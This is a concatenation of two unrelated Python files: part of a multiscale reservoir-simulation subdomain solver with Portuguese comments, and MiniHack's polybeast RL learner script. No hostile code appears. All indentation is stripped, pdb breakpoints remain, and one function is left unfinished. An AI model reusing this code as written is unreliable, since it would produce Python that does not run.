remaped_internal_faces = self.elements_lv0['remaped_internal_faces']
neig_internal_faces = self.elements_lv0['neig_internal_faces']
gid0 = self.data_impress['GID_0']
n_volumes = len(levels)
if self.pare:
import pdb; pdb.set_trace()
self.data_impress['val_diric'][:]=0
self.data_impress['val_neum'][:]=0
for level in range(1, self.n_levels):
str_level = str(level)
set_level = set([level])
all_gids_coarse = self.data_impress['GID_'+ str_level]
# all_local_ids_coarse = self.data_impress['COARSE_LOCAL_ID_'+ str_level]
all_intern_boundary_volumes = self.ml_data['internal_boundary_fine_volumes_level_'+ str_level]
all_intersect_faces = self.ml_data['coarse_intersect_faces_level_'+ str_level]
all_intern_faces = self.ml_data['coarse_internal_faces_level_'+ str_level]
all_faces = self.ml_data['coarse_faces_level_'+ str_level]
all_fine_vertex = self.ml_data['fine_vertex_coarse_volumes_level_'+ str_level]
coarse_ids = self.ml_data['coarse_primal_id_level_'+ str_level]
gids_level = np.unique(all_gids_coarse)
for gidc in gids_level:
intersect_faces = all_intersect_faces[coarse_ids==gidc][0] # faces na interseccao
intern_local_faces = all_intern_faces[coarse_ids==gidc][0] # faces internas
faces = all_faces[coarse_ids==gidc][0] # faces do volume
intern_boundary_volumes = all_intern_boundary_volumes[coarse_ids==gidc][0] # volumes internos no contorno
vertex = all_fine_vertex[coarse_ids==gidc]
pressure_vertex = pms[vertex]
volumes = self.elements_lv0['volumes'][all_gids_coarse==gidc]
level_volumes = levels[volumes]
volumes_dirichlet = set(volumes) & set(self.wells['ws_p'])
volumes_neuman = set(volumes) & set(self.wells['ws_q'])
adjs_intersect_faces = neig_internal_faces[remaped_internal_faces[intersect_faces]]
adj_intern_local_faces = neig_internal_faces[remaped_internal_faces[intern_local_faces]]
v0_new = adjs_intersect_faces.copy()
intersect_faces_new = intersect_faces.copy()
intern_boundary_volumes_new = intern_boundary_volumes.copy()
ind_diric = []
ind_neum = []
val_diric = []
val_neum = []
if volumes_dirichlet:
ind_diric += list(volumes_dirichlet)
for v in ind_diric:
val_diric += [self.wells['values_p'][self.wells['ws_p']==v][0]]
inds = ~((v0_new[:,0]==v) | (v0_new[:,1]==v))
intersect_faces_new = intersect_faces_new[inds]
intern_boundary_volumes_new = intern_boundary_volumes_new[~(intern_boundary_volumes_new==v)]
if volumes_neuman:
ind_neum += list(volumes_neuman)
for v in ind_neum:
val_neum += [self.wells['values_q'][self.wells['ws_q']==v][0]]
inds = ~((v0_new[:,0]==v) | (v0_new[:,1]==v))
v0_new = v0_new[inds]
intersect_faces_new = intersect_faces_new[inds]
intern_boundary_volumes_new = intern_boundary_volumes_new[~(intern_boundary_volumes_new==v)]
if len(intern_boundary_volumes_new) > 0:
v0 = v0_new
pms0 = pms[v0[:,0]]
pms1 = pms[v0[:,1]]
t0 = self.data_impress['transmissibility'][intersect_faces_new]
pms_flux_faces_local = get_flux_faces(pms1, pms0, t0)
pms_flux_faces[intersect_faces] = pms_flux_faces_local
lines = np.concatenate([v0[:, 0], v0[:, 1]])
cols = np.repeat(0, len(lines))
data = np.concatenate([pms_flux_faces_local, -pms_flux_faces_local])
flux_pms_volumes = sp.csc_matrix((data, (lines, cols)), shape=(n_volumes, 1)).toarray().flatten()
presc_flux_intern_boundary_volumes = flux_pms_volumes[intern_boundary_volumes_new]
ind_neum += list(intern_boundary_volumes_new)
val_neum += list(presc_flux_intern_boundary_volumes)
if len(ind_diric) == 0:
if set(vertex) & set(ind_neum):
candidatos = set(volumes) - set(ind_neum)
vol = candidatos.pop()
ind_diric += [vol]
val_diric += [pms[vol]]
else:
ind_diric += list(vertex)
val_diric += list(pressure_vertex)
# ind_diric=volumes[level_volumes==1]
# if len(ind_diric)>0:
#
# ind_diric=np.setdiff1d(ind_diric,intern_boundary_volumes_new)
# if len(ind_diric)>0:
# ind_diric=ind_diric[0]
# else:
# ind_diric=vertex
# else:
# ind_diric=vertex
# val_diric=pms[ind_diric]
self.data_impress['val_diric'][ind_diric]=val_diric
self.data_impress['val_neum'][ind_neum]=val_neum
list_of_subdomains.append(Subdomain(volumes, ind_diric, ind_neum, val_diric, val_neum, intern_local_faces, adj_intern_local_faces, self.T_without))
return list_of_subdomains, pms_flux_faces
def get_subdomains_2(self):
'''
ordem de envio:
volumes: global id dos volumes locais
ind_diric: indice dos volumes com pressao prescrita
ind_neum: indice dos volumes com vazao prescrita
val_diric: valores de pressao prescrita
val_neum: valores de vazao prescrita
local_transm: transmissibilidade local
all_faces: todas faces do coarse volume
intern_faces: faces internas do coarse volume
intersect_faces: faces na interseccao
'''
list_of_subdomains = []
pms_flux_faces = np.zeros(len(self.elements_lv0['faces']))
levels = self.data_impress['LEVEL']
pms = self.data_impress['pms']
remaped_internal_faces = self.elements_lv0['remaped_internal_faces']
neig_internal_faces = self.elements_lv0['neig_internal_faces']
gid0 = self.data_impress['GID_0']
n_volumes = len(gid0)
for level in range(1, self.n_levels):
str_level = str(level)
set_level = set([level])
all_gids_coarse = self.data_impress['GID_'+ str_level]
all_intern_boundary_volumes = self.ml_data['internal_boundary_fine_volumes_level_'+ str_level]
all_intersect_faces = self.ml_data['coarse_intersect_faces_level_'+ str_level]
all_intern_faces = self.ml_data['coarse_internal_faces_level_'+ str_level]
all_faces = self.ml_data['coarse_faces_level_'+ str_level]
all_fine_vertex = self.ml_data['fine_vertex_coarse_volumes_level_'+ str_level]
coarse_ids = self.ml_data['coarse_primal_id_level_'+ str_level]
gids_level = np.unique(all_gids_coarse)
import pdb; pdb.set_trace()
def preprocess(self):
list_of_subdomains, self.global_ms_flux_faces = self.get_subdomains()
list_of_process_per_cpu = self.get_n_workers(list_of_subdomains)
return list_of_process_per_cpu
def run(self):
list_of_process_per_cpu = self.preprocess()
master2worker = [mp.Pipe() for _ in range(self.n_workers)]
m2w, w2m = list(zip(*master2worker))
procs = [mp.Process(target=run_thing, args=[LocalSolution(obj, comm)]) for obj, comm in zip(list_of_process_per_cpu, w2m)]
del list_of_process_per_cpu
global_pcorr = np.zeros(len(self.data_impress['GID_0']))
for proc in procs:
proc.start()
for comm in m2w:
msg = comm.recv()
for resp in msg:
faces = resp[0]['faces']
ms_flux = resp[0]['ms_flux_faces']
self.global_ms_flux_faces[faces] = ms_flux
volumes = resp[1]['volumes']
pcorr = resp[1]['pcorr']
global_pcorr[volumes] = pcorr
for proc in procs:
proc.join()
return self.global_ms_flux_faces.copy(), global_pcorr
def get_flux_faces(p1, p0, t0, flux_grav_faces=None):
if flux_grav_faces != None:
flux = -((p1 - p0) * t0 - flux_grav_faces)
else:
flux = -((p1 - p0) * t0)
return flux
class Subdomain(CommonInfos):
def __init__(self, volumes, ind_diric, ind_neum, val_diric, val_neum,
intern_faces, adjs_intern_faces, T_global):
self.T_local = self.get_local_t(T_global, volumes).tolil()
self.volumes = volumes
self.ids_local = np.arange(len(volumes))
self.ind_diric = ind_diric
self.ind_neum = ind_neum
self.val_diric = val_diric
self.val_neum = val_neum
self.intern_faces = intern_faces
self.adjs_intern_faces = adjs_intern_faces
self.map_gid_in_lid = np.repeat(-1, volumes.max()+1)
self.map_gid_in_lid[volumes] = self.ids_local
class LocalSolution:
def __init__(self, subdomains, comm):
self.subdomains = subdomains
self.comm = comm
def run(self):
data = []
dt = [('faces', int), ('ms_flux_faces', float)]
dt_vol = [('volumes', int), ('pcorr', float)]
solver = solverTril()
for subd in self.subdomains:
volumes = subd.volumes
T_local = subd.T_local
ids_local = subd.ids_local
ind_diric = subd.ind_diric
ind_neum = subd.ind_neum
val_diric = subd.val_diric
val_neum = subd.val_neum
intern_faces = subd.intern_faces
adjs_intern_faces = subd.adjs_intern_faces
map_gid_in_lid = subd.map_gid_in_lid
ind_diric_local = map_gid_in_lid[ind_diric]
T_local_2 = T_local.copy()
T_local_2[ind_diric_local] = 0
T_local_2[ind_diric_local, ind_diric_local] = 1
b = np.zeros(len(volumes))
b[map_gid_in_lid[ind_neum]] = val_neum
b[map_gid_in_lid[ind_diric]] = val_diric
T_local_2 = T_local_2.tocsc()
x = solver.solve_linear_problem(T_local_2,b)
# x=a.solve(b)
# print('\n')
# print('pcorr')
# print(x)
# print('val_diric')
# print(val_diric)
# print('\n')
del T_local_2
t0 = T_local[map_gid_in_lid[adjs_intern_faces[:,0]], map_gid_in_lid[adjs_intern_faces[:,1]]].toarray().flatten()
p0 = x[map_gid_in_lid[adjs_intern_faces[:,0]]]
p1 = x[map_gid_in_lid[adjs_intern_faces[:,1]]]
ms_flux = get_flux_faces(p1, p0, t0)
sarray = np.zeros(len(intern_faces), dtype=dt)
sarray['faces'] = intern_faces
sarray['ms_flux_faces'] = ms_flux
sarray_vol = np.zeros(len(volumes), dtype=dt_vol)
sarray_vol['volumes'] = volumes
sarray_vol['pcorr'] = x
data.append([sarray, sarray_vol])
self.comm.send(data)
def run_thing(local_solution_obj):
local_solution_obj.run()
|
polybeast_learner.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Run with OMP_NUM_THREADS=1.
#
import argparse
import collections
import logging
import omegaconf
import os
import threading
import time
import timeit
import traceback
import wandb
import nest
import torch
from minihack.agent.polybeast.core import file_writer
from minihack.agent.polybeast.core import vtrace
from minihack.agent.polybeast.models import create_model, losses
from minihack.agent.polybeast.models.base import NetHackNet
from minihack.agent.polybeast.models.intrinsic import IntrinsicRewardNet
import libtorchbeast
from torch import nn
from torch.nn import functional as F
# yapf: disable
parser = argparse.ArgumentParser(description="PyTorch Scalable Agent")
parser.add_argument("--mode", default="train",
choices=["train", "test", "test_render"],
help="Training or test mode.")
parser.add_argument('--env', default='staircase', type=str, metavar='E',
help='Name of Gym environment to create.')
parser.add_argument("--wandb", action="store_true",
help="Log to wandb.")
parser.add_argument('--group', default='default', type=str, metavar='G',
help='Name of the experiment group (as being used by wandb).')
parser.add_argument('--project', default='minihack', type=str, metavar='P',
help='Name of the project (as being used by wandb).')
parser.add_argument('--entity', default='nethack', type=str, metavar='P',
help='Which team to log to.')
# Training settings.
parser.add_argument("--pipes_basename", default="unix:/tmp/polybeast",
help="Basename for the pipes for inter-process communication. "
"Has to be of the type unix:/some/path.")
parser.add_argument("--savedir", default="~/palaas/torchbeast",
help="Root dir where experiment data will be saved.")
parser.add_argument("--num_actors", default=4, type=int, metavar="N",
help="Number of actors")
parser.add_argument("--total_steps", default=1e6, type=float, metavar="T",
help="Total environment steps to train for. Will be cast to int.")
parser.add_argument("--batch_size", default=8, type=int, metavar="B",
help="Learner batch size")
parser.add_argument("--unroll_length", default=80, type=int, metavar="T",
help="The unroll length (time dimension)")
parser.add_argument("--num_learner_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--num_inference_threads", default=2, type=int,
metavar="N", help="Number learner threads.")
parser.add_argument("--learner_device", default="cuda:0", help="Set learner device")
parser.add_argument("--actor_device", default="cuda:1", help="Set actor device")
parser.add_argument("--disable_cuda", action="store_true",
help="Disable CUDA.")
parser.add_argument("--use_lstm", action="store_true",
help="Use LSTM in agent model.")
parser.add_argument("--use_index_select", action="store_true",
help="Whether to use index_select instead of embedding lookup.")
parser.add_argument("--max_learner_queue_size", default=None, type=int, metavar="N",
help="Optional maximum learner queue size. "
"Defaults to batch_size.")
# Model settings.
parser.add_argument('--model', default="baseline",
help='Name of the model to run')
parser.add_argument('--crop_model', default="cnn", choices=["cnn", "transformer"],
help='Size of cropping window around the agent')
parser.add_argument('--crop_dim', type=int, default=9,
help='Size of cropping window around the agent')
parser.add_argument('--embedding_dim', type=int, default=32,
help='Size of glyph embeddings.')
parser.add_argument('--hidden_dim', type=int, default=128,
help='Size of hidden representations.')
parser.add_argument('--layers', type=int, default=5,
help='Number of ConvNet/Transformer layers.')
# Loss settings.
parser.add_argument("--entropy_cost", default=0.0006, type=float,
help="Entropy cost/multiplier.")
parser.add_argument("--baseline_cost", default=0.5, type=float,
help="Baseline cost/multiplier.")
parser.add_argument("--discounting", default=0.99, type=float,
help="Discounting factor.")
parser.add_argument("--reward_clipping", default="tim",
choices=["soft_asymmetric", "none", "tim"],
help="Reward clipping.")
parser.add_argument("--no_extrinsic", action="store_true",
help=("Disables extrinsic reward (no baseline/pg_loss)."))
parser.add_argument("--normalize_reward", action="store_true",
help=("Normalizes reward by dividing by running stdev from "
"mean."))
# Optimizer settings.
parser.add_argument("--learning_rate", default=0.00048, type=float,
metavar="LR", help="Learning rate.")
parser.add_argument("--alpha", default=0.99, type=float,
help="RMSProp smoothing constant.")
parser.add_argument("--momentum", default=0, type=float,
help="RMSProp momentum.")
parser.add_argument("--epsilon", default=0.01, type=float,
help="RMSProp epsilon.")
parser.add_argument("--grad_norm_clipping", default=40.0, type=float,
help="Global gradient norm clip.")
# Misc settings.
parser.add_argument("--write_profiler_trace", action="store_true",
help="Collect and write a profiler trace "
"for chrome://tracing/.")
# yapf: enable
logging.basicConfig(
format=(
"[%(levelname)s:%(process)d %(module)s:%(lineno)d %(asctime)s] "
"%(message)s"
),
level=0,
)
def inference(
inference_batcher, model, flags, actor_device, lock=threading.Lock()
): # noqa: B008
with torch.no_grad():
for batch in inference_batcher:
batched_env_outputs, agent_state = batch.get_inputs()
observation, reward, done, *_ = batched_env_outputs
# Observation is a dict with keys 'features' and 'glyphs'.
observation["done"] = done
observation, agent_state = nest.map(
lambda t: t.to(actor_device, non_blocking=True),
(observation, agent_state),
)
with lock:
outputs = model(observation, agent_state)
core_outputs, agent_state = nest.map(lambda t: t.cpu(), outputs)
# Restructuring the output in the way that is expected
# by the functions in actorpool.
outputs = (
tuple(
(
core_outputs["action"],
core_outputs["policy_logits"],
core_outputs["baseline"],
core_outputs["chosen_option"],
core_outputs["teacher_logits"],
core_outputs["pot_sm"],
)
),
agent_state,
)
batch.set_outputs(outputs)
EnvOutput = collections.namedtuple(
"EnvOutput", "frame rewards done episode_step episode_return"
)
AgentOutput = NetHackNet.AgentOutput
Batch = collections.namedtuple("Batch", "env agent")
def clip(flags, rewards):
if flags.reward_clipping == "tim":
clipped_rewards = torch.tanh(rewards / 100.0)
elif flags.reward_clipping == "soft_asymmetric":
squeezed = torch.tanh(rewards / 5.0)
# Negative rewards are given less weight than positive rewards.
clipped_rewards = (
torch.where(rewards < 0, 0.3 * squeezed, squeezed) * 5.0
)
elif flags.reward_clipping == "none":
clipped_rewards = rewards
else:
raise NotImplementedError("reward_clipping=%s" % flags.reward_clipping)
return clipped_rewards
def learn(
learner_queue,
model,
actor_model,
optimizer,
scheduler,
stats,
flags,
plogger,
learner_device,
lock=threading.Lock(), # noqa: B008
):
for tensors in learner_queue:
tensors = nest.map(lambda t: t.to(learner_device), tensors)
batch, initial_agent_state = tensors
env_outputs, actor_outputs = batch
observation, reward, done, *_ = env_outputs
observation["reward"] = reward
observation["done"] = done
lock.acquire() # Only one thread learning at a time.
output, _ = model(observation, initial_agent_state, learning=True)
if flags.model == "foc":
# chosen_option
output["action"] = output["chosen_option"]
# Use last baseline value (from the value function) to bootstrap.
learner_outputs = AgentOutput._make(
(
output["action"],
output["policy_logits"],
output["baseline"],
output["chosen_option"],
output["teacher_logits"],
output["pot_sm"],
)
)
# At this point, the environment outputs at time step `t` are the inputs
# that lead to the learner_outputs at time step `t`. After the following
# shifting, the actions in `batch` and `learner_outputs` at time
# step `t` is what leads to the environment outputs at time step `t`.
batch = nest.map(lambda t: t[1:], batch)
learner_outputs = nest.map(lambda t: t[:-1], learner_outputs)
# Turn into namedtuples again.
env_outputs, actor_outputs = batch
# Note that the env_outputs.frame is now a dict with 'features' and 'glyphs'
# instead of actually being the frame itself. This is currently not a problem
# because we never use actor_outputs.frame in the rest of this function.
env_outputs = EnvOutput._make(env_outputs)
actor_outputs = AgentOutput._make(actor_outputs)
learner_outputs = AgentOutput._make(learner_outputs)
if flags.model == "foc":
actor_outputs = AgentOutput._make(
(
actor_outputs.chosen_option,
actor_outputs.policy_logits,
actor_outputs.baseline,
actor_outputs.chosen_option,
actor_outputs.teacher_logits,
actor_outputs.pot_sm,
)
)
learner_outputs = AgentOutput._make(
(
learner_outputs.chosen_option,
learner_outputs.policy_logits,
learner_outputs.baseline,
learner_outputs.chosen_option,
learner_outputs.teacher_logits,
learner_outputs.pot_sm,
)
)
rewards = env_outputs.rewards
if flags.normalize_reward:
model.update_running_moments(rewards)
rewards /= model.get_running_std()
total_loss = 0
# INTRINSIC REWARDS
calculate_intrinsic = (
isinstance(model, IntrinsicRewardNet) and model.intrinsic_enabled()
)
if calculate_intrinsic:
# Compute intrinsic reward and loss
if "int_baseline" not in output:
raise RuntimeError("Expected intrinsic outputs but found none")
# set intrinsic reward dimensions here so we don't make any mistakes later
intrinsic_reward = rewards.new_zeros(rewards.size()).float()
if flags.model == "rnd":
# Random Network Distillation
target = output["target"][1:]
predicted = output["predicted"][1:]
# loss for prediction failures, not really "forward" model
forward_loss = flags.rnd.forward_cost * F.mse_loss(
target, predicted, reduction="mean"
)
total_loss += forward_loss
# reward based on unpredicted scenarios
intrinsic_reward += (target - predicted).pow(2).sum(2) * 0.5
elif flags.model == "ride":
# Rewarding Impact-Driven Exploration
state_emb = output["state_embedding"][:-1]
next_state_emb = output["state_embedding"][1:]
actions = actor_outputs.action
pred_next_state_emb = model.forward_dynamics_model(
state_emb, actions
)
pred_actions = model.inverse_dynamics_model(
state_emb, next_state_emb
)
forward_loss = (
flags.ride.forward_cost
* losses.compute_forward_dynamics_loss(
pred_next_state_emb, next_state_emb
)
)
inverse_loss = (
flags.ride.inverse_cost
* losses.compute_inverse_dynamics_loss(
pred_actions, actions
)
)
total_loss += forward_loss + inverse_loss
intrinsic_reward += torch.norm(
next_state_emb - state_emb, dim=2, p=2
)
if flags.ride.count_norm:
if "state_visits" not in observation:
raise RuntimeError(
"ride.count_norm=true but state_counter=none"
)
# -- [T x B ]
counts = (
observation["state_visits"][1:]
.squeeze(-1)
.float()
.sqrt()
)
intrinsic_reward /= counts
if flags.int.normalize_reward:
model.update_intrinsic_moments(intrinsic_reward)
intrinsic_reward /= model.get_intrinsic_std()
intrinsic_reward *= flags.int.intrinsic_weight
if not flags.int.twoheaded and not flags.no_extrinsic:
# add intrinsic rewards to extrinsic ones
rewards += intrinsic_reward
# STANDARD EXTRINSIC LOSSES / REWARDS
if flags.entropy_cost > 0:
entropy_loss = flags.entropy_cost * losses.compute_entropy_loss(
learner_outputs.policy_logits
)
total_loss += entropy_loss
if not flags.no_extrinsic:
clipped_rewards = clip(flags, rewards)
discounts = (~env_outputs.done).float() * flags.discounting
# This could be in C++. In TF, this is actually slower on the GPU.
vtrace_returns = vtrace.from_logits(
behavior_policy_logits=actor_outputs.policy_logits,
target_policy_logits=learner_outputs.policy_logits,
actions=actor_outputs.action,
discounts=discounts,
rewards=clipped_rewards,
values=learner_outputs.baseline,
bootstrap_value=learner_outputs.baseline[-1],
)
# Compute loss as a weighted sum of the baseline loss, the policy
# gradient loss and an entropy regularization term.
pg_loss = losses.compute_policy_gradient_loss(
learner_outputs.policy_logits,
actor_outputs.action,
vtrace_returns.pg_advantages,
)
baseline_loss = flags.baseline_cost * losses.compute_baseline_loss(
vtrace_returns.vs - learner_outputs.baseline
)
total_loss += pg_loss + baseline_loss
# TWO-HEADED INTRINSIC REWARDS / LOSSES
if calculate_intrinsic and (flags.int.twoheaded or flags.no_extrinsic):
# here we calculate RL loss on the intrinsic reward using its own value head
# 1) twoheaded always separates ext and int rewards to their own heads
# 2) no_extrinsic skips the ext value head and uses only the int one
int_clipped_rewards = clip(flags, intrinsic_reward)
# use a separate discounting factor for intrinsic rewards
if flags.int.episodic:
int_discounts = (
~env_outputs.done
).float() * flags.int.discounting
else:
# can also do non-episodic intrinsic rewards
int_discounts = discounts.new_full(
discounts.size(), flags.int.discounting
)
int_vtrace_returns = vtrace.from_logits(
behavior_policy_logits=actor_outputs.policy_logits,
target_policy_logits=learner_outputs.policy_logits,
actions=actor_outputs.action,
discounts=int_discounts, # intrinsic discounts
rewards=int_clipped_rewards, # intrinsic reward
values=output["int_baseline"][1:], # intrinsic baseline
bootstrap_value=output["int_baseline"][
-1
], # intrinsic bootstrap
)
# intrinsic baseline loss
int_baseline_loss = (
flags.int.baseline_cost
* losses.compute_baseline_loss(
int_vtrace_returns.vs - output["int_baseline"][1:]
)
)
# intrinsic policy gradient loss
int_pg_loss = losses.compute_policy_gradient_loss(
learner_outputs.policy_logits,
actor_outputs.action,
int_vtrace_returns.pg_advantages,
)
total_loss += int_pg_loss + int_baseline_loss
# KICKSTARTING LOSS
ks_loss = 0
if flags.model in ["ks", "hks"]:
timestep = (
stats.get("step", 0) + flags.unroll_length * flags.batch_size
)
if timestep < flags.ks_max_time:
lam = flags.ks_max_lambda * max(
(1 - timestep / flags.ks_max_time),
flags.ks_min_lambda_prop,
)
else:
lam = flags.ks_min_lambda_prop * flags.ks_max_lambda
teacher_log_probs = torch.log(learner_outputs.teacher_logits)
policy_log_probs = torch.log_softmax(
learner_outputs.policy_logits, 2
)
ks_loss = lam * nn.KLDivLoss(
log_target=True, reduction="batchmean"
)(teacher_log_probs, policy_log_probs)
print("~", timestep, "total_loss", total_loss, "ks_loss", ks_loss)
total_loss += ks_loss
# BACKWARD STEP
optimizer.zero_grad()
total_loss.backward()
if flags.grad_norm_clipping > 0:
nn.utils.clip_grad_norm_(
model.parameters(), flags.grad_norm_clipping
)
optimizer.step()
scheduler.step()
actor_model.load_state_dict(model.state_dict())
# LOGGING
# episode_rewards = env_outputs.rewards
# print('!', episode_rewards)
# print('?', env_outputs.episode_return)
# print('@', env_outputs.done)
# Success rate
done_masked = env_outputs.done.cpu()
done_masked[0, :] = False
false_fill = torch.zeros((1, done_masked.shape[1]), dtype=torch.bool)
done_m1 = torch.cat((done_masked[1:, :], false_fill), dim=0)
masked_returns = env_outputs.episode_return[done_masked]
masked_returns_m1 = env_outputs.episode_return[done_m1]
diff = masked_returns - masked_returns_m1
n_wins = len(diff[diff > 0.5])
n_losses = len(diff[diff < -0.5])
if n_wins + n_losses != len(diff):
print("Invalid runs, some did not end in a win or a loss:")
print(diff)
if len(diff) == 0:
success_rate = None
else:
success_rate = n_wins / len(diff)
stats["success_rate"] = success_rate
# Meta network entropy
if flags.model in ["hks"]:
meta_sm = actor_outputs.pot_sm
entropies = -(meta_sm * torch.log(meta_sm)).sum(dim=2)
avg_entropy = torch.mean(entropies)
stats["meta_entropy"] = avg_entropy
# Other stats
episode_returns = env_outputs.episode_return[env_outputs.done]
stats["step"] = (
stats.get("step", 0) + flags.unroll_length * flags.batch_size
)
stats["mean_episode_return"] = torch.mean(episode_returns).item()
stats["mean_episode_step"] = torch.mean(
env_outputs.episode_step.float()
).item()
stats["total_loss"] = total_loss.item()
if flags.entropy_cost > 0:
stats["entropy_loss"] = entropy_loss.item()
if not flags.no_extrinsic:
stats["pg_loss"] = pg_loss.item()
stats["baseline_loss"] = baseline_loss.item()
stats["learner_queue_size"] = learner_queue.size()
if calculate_intrinsic:
stats["intrinsic_reward"] = torch.mean(intrinsic_reward).item()
if flags.model == "rnd":
stats["forward_loss"] = forward_loss.item()
elif flags.model == "ride":
stats["forward_loss"] = forward_loss.item()
stats["inverse_loss"] = inverse_loss.item()
if flags.int.twoheaded:
stats["int_baseline_loss"] = int_baseline_loss.item()
stats["int_pg_loss"] = int_pg_loss.item()
if "state_visits" in observation:
visits = observation["state_visits"][:-1]
metric = visits[env_outputs.done].float()
key1 = "mean_state_visits"
key2 = "max_state_visits"
if not len(episode_returns):
stats[key1] = None
stats[key2] = None
else:
stats[key1] = torch.mean(metric).item()
stats[key2] = torch.max(metric).item()
DEBUG = False
if DEBUG and env_outputs.done.sum() > 0:
print()
print("glyphs shape", env_outputs.frame["glyphs"].shape)
print("features shape", env_outputs.frame["features"].shape)
print(
"episode_step",
env_outputs.episode_step[:, 0],
env_outputs.episode_step.shape,
)
print(
"rewards", env_outputs.rewards[:, 0], env_outputs.rewards.shape
)
print(
"episode_return",
env_outputs.episode_return[:, 0],
env_outputs.episode_return.shape,
)
print("done", env_outputs.done[:, 0], env_outputs.done.shape)
if not len(episode_returns):
# Hide the mean-of-empty-tuple NaN as it scares people.
stats["mean_episode_return"] = None
# Only logging if at least one episode was finished
if len(episode_returns):
# TODO: log also SPS
plogger.log(stats)
if flags.wandb:
wandb.log(stats, step=stats["step"])
lock.release()
def train(flags):
logging.info("Logging results to %s", flags.savedir)
if isinstance(flags, omegaconf.DictConfig):
flag_dict = omegaconf.OmegaConf.to_container(flags)
else:
flag_dict = vars(flags)
plogger = file_writer.FileWriter(xp_args=flag_dict, rootdir=flags.savedir)
if not flags.disable_cuda and torch.cuda.is_available():
logging.info("Using CUDA.")
learner_device = torch.device(flags.learner_device)
actor_device = torch.device(flags.actor_device)
else:
logging.info("Not using CUDA.")
learner_device = torch.device("cpu")
actor_device = torch.device("cpu")
if flags.max_learner_queue_size is None:
flags.max_learner_queue_size = flags.batch_size
# The queue the learner threads will get their data from.
# Setting `minimum_batch_size == maximum_batch_size`
# makes the batch size static. We could make it dynamic, but that
# requires a loss (and learning rate schedule) that's batch size
# independent.
learner_queue = libtorchbeast.BatchingQueue(
batch_dim=1,
minimum_batch_size=flags.batch_size,
maximum_batch_size=flags.batch_size,
check_inputs=True,
maximum_queue_size=flags.max_learner_queue_size,
)
# The "batcher", a queue for the inference call. Will yield
# "batch" objects with `get_inputs` and `set_outputs` methods.
# The batch size of the tensors will be dynamic.
inference_batcher = libtorchbeast.DynamicBatcher(
batch_dim=1,
minimum_batch_size=1,
maximum_batch_size=512,
timeout_ms=100,
check_outputs=True,
)
addresses = []
connections_per_server = 1
pipe_id = 0
while len(addresses) < flags.num_actors:
for _ in range(connections_per_server):
addresses.append(f"{flags.pipes_basename}.{pipe_id}")
if len(addresses) == flags.num_actors:
break
pipe_id += 1
logging.info("Using model %s", flags.model)
model = create_model(flags, learner_device)
plogger.metadata["model_numel"] = sum(
p.numel() for p in model.parameters() if p.requires_grad
)
logging.info(
"Number of model parameters: %i", plogger.metadata["model_numel"]
)
actor_model = create_model(flags, actor_device)
# The ActorPool that will run `flags.num_actors` many loops.
actors = libtorchbeast.ActorPool(
unroll_length=flags.unroll_length,
learner_queue=learner_queue,
inference_batcher=inference_batcher,
env_server_addresses=addresses,
initial_agent_state=model.initial_state(),
)
def run():
try:
actors.run()
except Exception as e:
logging.error("Exception in actorpool thread!")
traceback.print_exc()
print()
raise e
actorpool_thread = threading.Thread(target=run, name="actorpool-thread")
optimizer = torch.optim.RMSprop(
model.parameters(),
lr=flags.learning_rate,
momentum=flags.momentum,
eps=flags.epsilon,
alpha=flags.alpha,
)
def lr_lambda(epoch):
return (
1
- min(
epoch * flags.unroll_length * flags.batch_size,
flags.total_steps,
)
/ flags.total_steps
)
scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda)
stats = {}
if flags.checkpoint and os.path.exists(flags.checkpoint):
logging.info("Loading checkpoint: %s" % flags.checkpoint)
checkpoint_states = torch.load(
flags.checkpoint, map_location=flags.learner_device
)
model.load_state_dict(checkpoint_states["model_state_dict"])
optimizer.load_state_dict(checkpoint_states["optimizer_state_dict"])
scheduler.load_state_dict(checkpoint_states["scheduler_state_dict"])
stats = checkpoint_states["stats"]
logging.info(f"Resuming preempted job, current stats:\n{stats}")
# Initialize actor model like learner model.
actor_model.load_state_dict(model.state_dict())
learner_threads = [
threading.Thread(
target=learn,
name="learner-thread-%i" % i,
args=(
learner_queue,
model,
actor_model,
optimizer,
scheduler,
stats,
flags,
plogger,
learner_device,
),
)
for i in range(flags.num_learner_threads)
]
inference_threads = [
threading.Thread(
target=inference,
name="inference-thread-%i" % i,
args=(inference_batcher, actor_model, flags, actor_device),
)
for i in range(flags.num_inference_threads)
]
actorpool_thread.start()
for t in learner_threads + inference_threads:
t.start()
def checkpoint(checkpoint_path=None):
if flags.checkpoint:
if checkpoint_path is None:
checkpoint_path = flags.checkpoint
logging.info("Saving checkpoint to %s", checkpoint_path)
torch.save(
{
"model_state_dict": model.state_dict(),
"optimizer_state_dict": optimizer.state_dict(),
"scheduler_state_dict": scheduler.state_dict(),
"stats": stats,
"flags": vars(flags),
},
checkpoint_path,
)
def format_value(x):
return f"{x:1.5}" if isinstance(x, float) else str(x)
try:
train_start_time = timeit.default_timer()
train_time_offset = stats.get(
"train_seconds", 0
) # used for resuming training
last_checkpoint_time = timeit.default_timer()
dev_checkpoint_intervals = [0, 0.25, 0.5, 0.75]
loop_start_time = timeit.default_timer()
loop_start_step = stats.get("step", 0)
while True:
if loop_start_step >= flags.total_steps:
break
time.sleep(5)
loop_end_time = timeit.default_timer()
loop_end_step = stats.get("step", 0)
stats["train_seconds"] = round(
loop_end_time - train_start_time + train_time_offset, 1
)
if loop_end_time - last_checkpoint_time > 10 * 60:
# Save every 10 min.
checkpoint()
last_checkpoint_time = loop_end_time
if len(dev_checkpoint_intervals) > 0:
step_percentage = loop_end_step / flags.total_steps
i = dev_checkpoint_intervals[0]
if step_percentage > i:
checkpoint(flags.checkpoint[:-4] + "_" + str(i) + ".tar")
dev_checkpoint_intervals = dev_checkpoint_intervals[1:]
logging.info(
"Step %i @ %.1f SPS. Inference batcher size: %i."
" Learner queue size: %i."
" Other stats: (%s)",
loop_end_step,
(loop_end_step - loop_start_step)
/ (loop_end_time - loop_start_time),
inference_batcher.size(),
learner_queue.size(),
", ".join(
f"{key} = {format_value(value)}"
for key, value in stats.items()
),
)
loop_start_time = loop_end_time
loop_start_step = loop_end_step
